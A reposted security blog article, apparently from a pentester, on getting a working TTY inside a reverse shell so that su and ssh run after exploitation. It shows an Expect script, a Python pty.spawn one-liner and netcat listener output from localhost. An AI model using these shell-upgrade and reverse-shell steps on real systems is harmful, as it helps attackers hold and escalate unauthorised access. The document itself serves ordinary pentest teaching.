首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Exploitation Without A TTY
来源:vfocus.net 作者:vfocus 发布时间:2010-12-29  

This is a follow-up to a topic I touched on breifly before when I talked about the problem of trying to use the SSH client when you don’t have a TTY.  I was recently in a position where I got an interactive shell on a box, discovered the root password but was unable to get root because I couldn’t run “login” or “su”.  Both of these required a TTY in order to work.

I don’t present a definitive solution in this problem (if you have one please sent it in!).  However I discuss a couple of approaches to getting a TTY…

Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password:  mypassword
localhost ~ #

Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
sh: no job control in this shell
sh-3.2$ ssh localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
<big pause>
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
sh: no job control in this shell
sh-3.2$ ssh -T localhost
<big pause>

After we run sh.exp we are able to use the ssh client as normal:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
sh: no job control in this shell
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ ssh localhost
ssh localhost
Password: mypassword
Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1

user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s glob.  It should be effective against gentoo systems at least because the gentoo package management runs on python.

$ nc -v -n -l -p 1234
listening on [any] 1234 …
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ python -c ‘import pty; pty.spawn(“/bin/sh”)’
sh-3.2$ su -
su -
Password:
localhost ~ #

Using PERL To Get A TTY

This is not such as great solution as IO::Pty isn’t installed by default on any system I’ve seen.  For completeness, though:

<hmmm… can’t get it will working.  Will post later.>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·长达1年半的一次艰难渗透
·Windows系统密码破解全攻略(hash
·啊江统计系统V1.6 版本后台拿SHE
·Metasploit with MYSQL in BackT
·The Operation Outbreak Attack
·另类网站入侵之一句话木马图片的
·时间和状态:利用漏洞改变游戏角
·WebLogic简单抓鸡大法
·暴力破解asp一句话[php版]
·GRE数据包注入攻击
·oracle低权限下获取shell
·各种渗透,提权的经验和技巧总结
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved